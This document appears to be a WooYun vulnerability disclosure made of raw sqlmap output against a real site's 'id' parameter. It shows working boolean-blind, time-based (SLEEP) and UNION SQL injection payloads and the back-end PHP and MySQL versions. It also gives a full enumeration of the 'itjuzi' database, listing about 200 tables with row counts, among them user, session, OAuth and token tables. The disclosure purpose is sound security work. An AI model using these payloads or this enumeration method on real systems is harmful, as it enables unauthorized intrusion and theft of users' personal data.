WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1) AND 2340=2340 AND (2895=2895&type=invsp
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))ZjqW) AND (1982=1982&type=invsp
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1) UNION ALL SELECT NULL,NULL,CONCAT(0x71627a6b71,0x50744e6c4c645a4b476a,0x7170626a71),NULL,NULL,NULL-- &type=invsp
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL >= 5.0.0
Database: itjuzi
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| mobile_sessions                      | 959290  |
| tbl_search                           | 359979  |
| tbl_front_users_groups               | 198273  |
| tbl_front_user                       | 197714  |
| ci_sessions                          | 160444  |
| spider_news                          | 149028  |
| db_company_all                       | 141976  |
| tbl_rel_com_with_new_tag             | 136607  |
| tbl_front_user_follow_scope          | 100484  |
| tbl_view_count                       | 89585   |
| tbl_rel_api_with_db                  | 67713   |
| tbl_front_user_follow_com            | 63942   |
| spider_coms                          | 60653   |
| db_company_managers                  | 59982   |
| db_manager                           | 59982   |
| tbl_rel_com_with_tag                 | 54334   |
| click_like                           | 47998   |
| tbl_rel_auth_user                    | 47691   |
| tbl_oauth                            | 47617   |
| tbl_rel_per_with_skills              | 39788   |
| tbl_rel_com_with_mil                 | 37103   |
| tbl_com_mile_stone                   | 36921   |
| tbl_rel_front_user_goal              | 36767   |
| tbl_contacts_person_connect          | 33194   |
| tbl_contacts_rel_person_with_tag     | 33084   |
| tbl_rel_front_user_skill             | 31807   |
| tbl_rel_com_with_new                 | 30595   |
| tbl_new                              | 30586   |
| tbl_company                          | 29873   |
| tbl_contribution                     | 28012   |
| mixed_timeline                       | 26835   |
| tbl_rel_com_with_new_cat             | 26492   |
| tbl_rel_com_with_new_sub_cat         | 26467   |
| tbl_com_image                        | 25840   |
| tbl_rel_com_with_image               | 25101   |
| tbl_rel_per_with_com                 | 23195   |
| tbl_contacts_person                  | 22054   |
| tbl_person                           | 20053   |
| tbl_contacts_history                 | 18935   |
| tbl_contacts_rel_person_with_history | 18929   |
| user_token                           | 18786   |
| tbl_rel_invse_with_invsp_or_invst    | 17883   |
| tbl_rel_invst_with_scope             | 17792   |
| tbl_front_user_follow_circle         | 15594   |
| tbl_commont_star                     | 15457   |
| tbl_product                          | 13179   |
| tbl_rel_com_with_product             | 13179   |
| tbl_investevent                      | 12990   |
| tbl_front_user_follow_investment     | 11833   |
| tbl_clues                            | 10467   |
| tbl_search_count_data                | 10304   |
| user_phone_cms                       | 9662    |
| tbl_rel_invst_with_state             | 7456    |
| tbl_rel_per_with_education           | 7439    |
| tbl_hunt_invst_action                | 7267    |
| spider_news_2015                     | 7048    |
| tbl_rel_per_with_ever_job            | 6565    |
| tbl_claim                            | 6384    |
| search_total                         | 5461    |
| tbl_maimai_tag                       | 5440    |
| new_comment                          | 5364    |
| today_product                        | 5002    |
| addr_list                            | 4223    |
| tbl_maimai_relation                  | 3948    |
| tbl_testpage                         | 3890    |
| tbl_app_ddashi_company               | 3820    |
| tbl_commont                          | 3679    |
| tbl_front_user_follow_investor       | 3574    |
| tbl_user_center_count                | 3502    |
| tbl_front_user_follow_album          | 3134    |
| tbl_album_company                    | 3080    |
| tbl_coolchuan_relation_with_com      | 2683    |
| tbl_rel_hunt_invst_with_scope        | 2427    |
| user_msg                             | 2348    |
| tbl_rel_com_with_scale               | 2324    |
| talk_hot_num                         | 2185    |
| tbl_investment                       | 2153    |
| tal_rel_archive_cat_with_company     | 2040    |
| tbl_rel_invst_with_invsp             | 1701    |
| tbl_activity_mem                     | 1659    |
| tbl_investor                         | 1602    |
| talk                                 | 1571    |
| today_smtp_subscriber                | 1275    |
| tbl_merger                           | 1162    |
| tbl_com_credit_basic                 | 1039    |
| spider_invest                        | 972     |
| tbl_front_user_follow_experience     | 961     |
| tbl_rel_hunt_invst_with_round        | 865     |
| tbl_new_tag                          | 789     |
| tbl_rel_new_cat_with_new_tag         | 772     |
| tbl_project_tag                      | 666     |
| tbl_per_ever_job                     | 617     |
| tbl_invite_code                      | 572     |
| tbl_per_education                    | 521     |
| spider_news_delay                    | 518     |
| tbl_rel_hunt_invst_with_currency     | 454     |
| user_connect                         | 420     |
| rand_name                            | 401     |
| tbl_invst_address                    | 372     |
| today_user_follow_album              | 349     |
| tbl_com_tag                          | 342     |
| tbl_rel_com_tag_with_category        | 325     |
| tbl_hunt_invst_info                  | 306     |
| today_album_company                  | 292     |
| tbl_front_user_follow_archive        | 274     |
| tbl_album                            | 250     |
| ci_sessions_3                        | 231     |
| comment_replay                       | 225     |
| tbl_new_cat                          | 200     |
| spider_news_used                     | 199     |
| tal_rel_archive_with_cat             | 166     |
| tbl_company_chief                    | 151     |
| tbl_hunt_follow_project              | 140     |
| tbl_project_team                     | 140     |
| shanghai_article                     | 127     |
| circle_topic                         | 124     |
| tbl_project_detail                   | 117     |
| my_follow                            | 113     |
| tbl_rel_project_with_tag             | 100     |
| tbl_contacts_person_tag              | 92      |
| tbl_activity                         | 86      |
| tbl_new_pingwest                     | 85      |
| microdata                            | 78      |
| feed_back                            | 70      |
| tbl_rel_com_with_similar             | 54      |
| tbl_project                          | 49      |
| tbl_project_contact                  | 49      |
| correct_company_by_user              | 47      |
| user_verrify                         | 39      |
| tbl_hunt_user_submit                 | 38      |
| users_groups                         | 38      |
| tbl_investor_role                    | 37      |
| users                                | 37      |
| tbl_report                           | 36      |
| tbl_invst_news                       | 34      |
| today_album                          | 32      |
| user_add_custom                      | 30      |
| smtp_week_today                      | 29      |
| birth_first_year_msg                 | 25      |
| tbl_com_change                       | 25      |
| feedback_msg                         | 24      |
| tbl_invst_image                      | 23      |
| tbl_activity_summary                 | 22      |
| tbl_com_tag_category                 | 22      |
| tbl_com_scope                        | 21      |
| tbl_rel_activity_with_show           | 21      |
| tbl_rel_invst_with_image             | 21      |
| tbl_investment_scope                 | 20      |
| tbl_per_skills                       | 18      |
| tbl_front_user_skill                 | 17      |
| tal_archive                          | 15      |
| tbl_activity_jushuo                  | 14      |
| tbl_com_fund_status                  | 14      |
| tbl_new_type                         | 14      |
| tbl_investevent_round                | 12      |
| tbl_commont_replay                   | 11      |
| circle                               | 10      |
| shanghai_activity_list               | 10      |
| topic_type                           | 10      |
| tbl_front_user_goal                  | 9       |
| tbl_investment_state                 | 9       |
| tbl_merger_identity                  | 9       |
| tbl_product_type                     | 9       |
| tbl_com_listed                       | 8       |
| tbl_investevent_currency             | 8       |
| tbl_invst_new_type                   | 8       |
| tbl_activity_report                  | 7       |
| tbl_investevent_assess_money         | 7       |
| my_inform                            | 5       |
| tbl_contribution_role                | 5       |
| tbl_investevent_similar_money        | 5       |
| tbl_com_credit_partners              | 4       |
| tbl_com_fund_needs                   | 4       |
| tbl_com_stage                        | 4       |
| tbl_com_status                       | 4       |
| tbl_front_groups                     | 4       |
| tbl_report_type                      | 4       |
| groups                               | 3       |
| tbl_com_credit_employees             | 3       |
| tbl_front_user_role                  | 3       |
| tbl_hunt_service                     | 3       |
| tbl_hunt_service_type                | 3       |
| tbl_wechat_img                       | 3       |
| site_base                            | 1       |
| tbl_invst_capital                    | 1       |
| tbl_invst_mile_stone                 | 1       |
| user_update_new_version              | 1       |
+--------------------------------------+---------+